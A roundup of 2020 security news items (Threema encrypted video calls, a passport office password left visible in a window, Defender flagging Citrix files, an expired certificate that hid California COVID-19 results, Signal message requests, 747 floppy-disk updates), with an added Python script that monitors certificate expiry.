Secure instant messaging app Threema has rolled out support this week for end-to-end encrypted (E2EE) video calls for its mobile applications. Monday's update brings the app in the elite echelon of instant messaging applications that support secure encrypted video calls, together with the likes of Signal, WhatsApp, Wickr, and Wire. Secure E2EE instant messaging applications still lacking support for this feature include Keybase (recently acquired by Zoom) and Telegram (which promised to have it ready by the end of 2020). Threema said the new E2EE video calling feature is based on the WebRTC streaming protocol, the same technology that's also included with all major browsers today, and which is also at the base of many video streaming applications. The difference is that Threema's implementation encrypts video calls between users' devices, using locally stored encryption keys. This prevents man-in-the-middle attacks, where attackers might want to intercept calls.

Plymouth Passport Office’s pitiful password privacy

The Home Office has confirmed there has been "no security breach" after a password was displayed in the window of Plymouth's Passport Office building. The staff password could be seen written on a flipchart and propped up against a window at the HM Passport Office building, clearly visible to passersby at the weekend. Some concerned residents got in touch to say it was "worrying" people "dealing with matters of national security" appeared to be using an easy-to-guess password, and that the password could be easily spotted when walking past the passport office in Plymouth city centre. A spokesperson from the Home Office has confirmed to PlymouthLive the password, "Passw0rd1," is indeed used by staff.

Windows Defender deletes Citrix components mislabeled as malware

Citrix released an advisory on Thursday about troublesome Windows Defender definition updates that break Delivery Controllers and Cloud Connectors running Microsoft's antivirus. The issue is due to Windows Defender misidentifying as malicious and quarantining the main and secondary Citrix broker services (BrokerService.exe and HighAvailabilityService.exe) responsible for tracking current user connections/sessions. Both files were erroneously detected as the information-stealing malware Agent Tesla and sent to isolation.

Expired certificate led to an undercount of COVID-19 results

An expired certificate and an outage led to an undercounting of COVID-19 cases reported in California after 250,000-300,000 lab results were prevented from being uploaded to California's CalREDIE reporting system. CalREDIE is a data system created by California to report and monitor cases of infectious disease. Using this system, California can more easily spot outbreaks and incidents of community spread as it moves forward with the plans to open schools. On July 25th, a data outage prevented the CalREDIE system from accepting lab results from external partners. A temporary fix was put into place but was not removed properly, which led to further problems. In addition to the outage, a certificate expired, which prevented lab partners like Quest from uploading California lab results to the data system. These problems ultimately led to a backlog of 250,000-300,000 results and an underreporting of COVID-19 cases.
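A certificate that lapses silently is the failure mode here, and the check a practitioner would want is an expiry monitor that warns well before `notAfter`. The following is an added example and is not code from CalREDIE, Quest or the original article; the warning threshold and any host it is pointed at are assumptions. It uses only the standard library: `days_until_expiry` and `classify` work offline on the `notAfter` string that `ssl` returns, and `check_endpoint` performs a live TLS handshake.

```python
"""Certificate-expiry check.  Added example, not code from the article.

`ssl.cert_time_to_seconds` parses the notAfter format that
ssl.SSLSocket.getpeercert() returns, e.g. 'Jul 25 00:00:00 2020 GMT'.
"""
import socket
import ssl
from datetime import datetime, timedelta, timezone


def utc(year: int, month: int, day: int) -> datetime:
    """Helper for building timezone-aware 'now' values."""
    return datetime(year, month, day, tzinfo=timezone.utc)


def days_until_expiry(not_after: str, now: datetime) -> float:
    """Days (possibly negative) from `now` until the certificate expires."""
    expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(not_after), tz=timezone.utc)
    return (expires - now) / timedelta(days=1)


def classify(not_after: str, now: datetime, warn_days: int = 30) -> str:
    """EXPIRED, WARN (within warn_days of expiry) or OK."""
    days = days_until_expiry(not_after, now)
    if days < 0:
        return "EXPIRED"
    if days < warn_days:
        return "WARN"
    return "OK"


def fetch_not_after(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Handshake with a verifying context and return the leaf cert's notAfter."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]


def check_endpoint(host: str, port: int = 443, now: datetime = None, warn_days: int = 30):
    """Live check. A verifying handshake against an already-expired certificate
    fails before the certificate can be read, which is exactly what an
    uploading partner would hit, so that case is reported as FAIL."""
    now = now or datetime.now(timezone.utc)
    try:
        not_after = fetch_not_after(host, port)
    except ssl.SSLCertVerificationError as exc:
        return ("FAIL", str(exc))
    return (classify(not_after, now, warn_days), not_after)


if __name__ == "__main__":
    # Offline demonstration on constructed notAfter values.
    now = utc(2020, 8, 1)
    for not_after in ("Jul 25 00:00:00 2020 GMT", "Aug 20 00:00:00 2020 GMT", "Dec 31 23:59:59 2020 GMT"):
        print(not_after, "->", classify(not_after, now))
    # check_endpoint("reporting.example", 443)  # assumed host; requires network
```

The point of the WARN tier is that the live check cannot help once the certificate has expired: with verification on, `getpeercert()` is never reached, and with verification off it returns an empty dict, so the monitor has to fire while the certificate is still valid.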

Signal adds message requests to stop spam and protect user privacy

Secure instant messaging app Signal has rolled out a new feature called Message Requests that lets users approve or block who can contact them via text or voice call, and whether they can be added to group chats. With Signal adoption growing in recent years due to its reputation as a secure communications channel with robust end-to-end encryption (E2EE), the app is bound to see its fair share of spammers in the future.

Boeing 747s receive software updates over floppy disks

Boeing 747-400s still use floppy disks for loading critical navigation databases, Pen Test Partners has revealed to the infosec community after poking about in one of the recently abandoned aircraft. The eye-catching factoid emerged during a DEF CON video interview of PTP's Alex Lomas, where the man himself gave a walkthrough of a 747-400, its avionics bay and the flight deck. Although airliners are not normally available to curious infosec researchers, a certain UK-based Big Airline's decision to scrap its B747 fleet gave Pen Test Partners a unique opportunity to get aboard one and have a poke about before the scrap merchants set about their grim task.